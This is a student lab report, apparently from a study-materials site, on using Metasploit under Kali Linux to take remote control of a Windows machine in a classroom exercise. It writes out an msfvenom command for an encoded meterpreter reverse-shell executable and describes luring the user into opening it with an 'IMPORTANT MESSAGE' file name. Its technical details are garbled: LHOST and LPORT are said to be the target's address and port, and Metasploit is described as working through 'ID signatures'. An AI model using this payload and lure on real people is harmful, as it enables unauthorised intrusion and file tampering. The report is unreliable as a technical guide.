This article discusses the use of Metasploit to carry out penetration tests on Windows machines remotely. It provides a step-by-step guide on how to set up the experiment and execute the exploit. The article also highlights the importance of knowledge on common penetration tests to protect organization data resource.
Contribute Materials
Your contribution can guide someone’s learning journey. Share your
documents today.
Running Head: ICT ETHICAL HACKING (EXPLOITS)1 KALI LINUX EXPLOIT USING METASPLOIT Student name Institution Affiliation Facilitator Course Date
Secure Best Marks with AI Grader
Need help grading? Try our AI Grader for instant feedback on your assignments.
ICT ETHICAL HACKING (EXPLOITS)2 Introduction In this era where cybersecurity has emerged to be a major threat to information systems, knowledge on some of the common penetration tests which can be used by attackers to compromise organization systems is of paramount importance. This is because it enables the IT professionals to test and implement the necessary measures to protect the organization data resource. Our workshop session on common exploitation approaches used by attackers, we experimented Metasploit exploitation under Kali Linux platform. The targeted machine was however was supposed to be operating under Windows operating system regardless of the version (windows XP, 7, 8, 8.1 and 10). The main aim of our experiment was to learn how attackers can be able to penetrate into machines operating on windows remotely and without the consent of the main user of the machine (Dieterle, 2016). Metasploit is a project which enables the attackers carry out penetration into the victim’s machine through development of ID signatures. To achieve that, the tool enables the attackers to come up with an exploit code which is then executed on targeted remote machines to enable them get into the machine with full user rights (Holik, Horalek, Marik, Neradova & Zitta, 2014, p.241).. To set up out penetration test experiment, we required: Metasploit framework with full Ruby packages installed under the Kali Linux platform machine and two computers running different operating systems (one Kali Linux and the other Windows). The two machines were set under same NAT network in order to allow us retrieve their IP addresses and PORT numbers easily. Also, since an antivirus in the targeted machine would hinder us from realizing our exploitation objective, we made sure that the windows platform machine did not have any antivirus software operating on it The penetration test entirely involved carrying out commands on the Kali Linux platform machine and the main Metasploit command we utilized was the Msfconsole because of its flexibility and other favorable features supporting Metasploit framework. To be able to gain access into the second machine, we needed to know the machines IP address and any of its free PORT numbers. To acquire the
ICT ETHICAL HACKING (EXPLOITS)3 two, we simply used Netcut software considering the fact that the two machines were operating under the same NAT network (Muniz, 2013). Into the real business, we started by creating executable files whose unique identifiers were basically the IP address and the PORT numberwe had obtained from the targeted machine using the Msfconsole command “msfvenom –p windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine) LPORT= (PORT in the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”. The next step was to make sure that the file is send to the targeted machine and trick the user into opening it. So we saved the folder as “IMPORTANT MESSAGE”, to be sure that the user will definitely be tempted to open it. After sending the file, we activated our metasploit framework to listen to the file using the Msfconsole command “exploit”. Under this state, the “meterpreter” would be activated on our Kali Linux machine automatically when the targeted user opens the sent files and would enable us get access into his or her machine immediately. So, after the file was opened on the second machine, we automatically gained access into the victim’s machine with the full control rights just like a person logged into the machine physically. We could carry out several operations like editing files, deleting files, viewing folders and removing some directories (Weidman, 2014). That was a clear implication that we had gotten into the machine remotely without the owner’s consent. References Dieterle, D. W. (2016).Basic Security Testing with Kali Linux. CreateSpace IndependentPublishing Platform. Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effectivepenetration testing with Metasploit framework and methodologies. InComputational Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on(pp.237-242). IEEE. Muniz, J. (2013).Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
ICT ETHICAL HACKING (EXPLOITS)4 Pritchett, W. L., & De Smet, D. (2013).Kali Linux Cookbook. Packt Publishing Ltd Weidman, G. (2014).Penetration testing: a hands-on introduction to hacking. No Starch Press.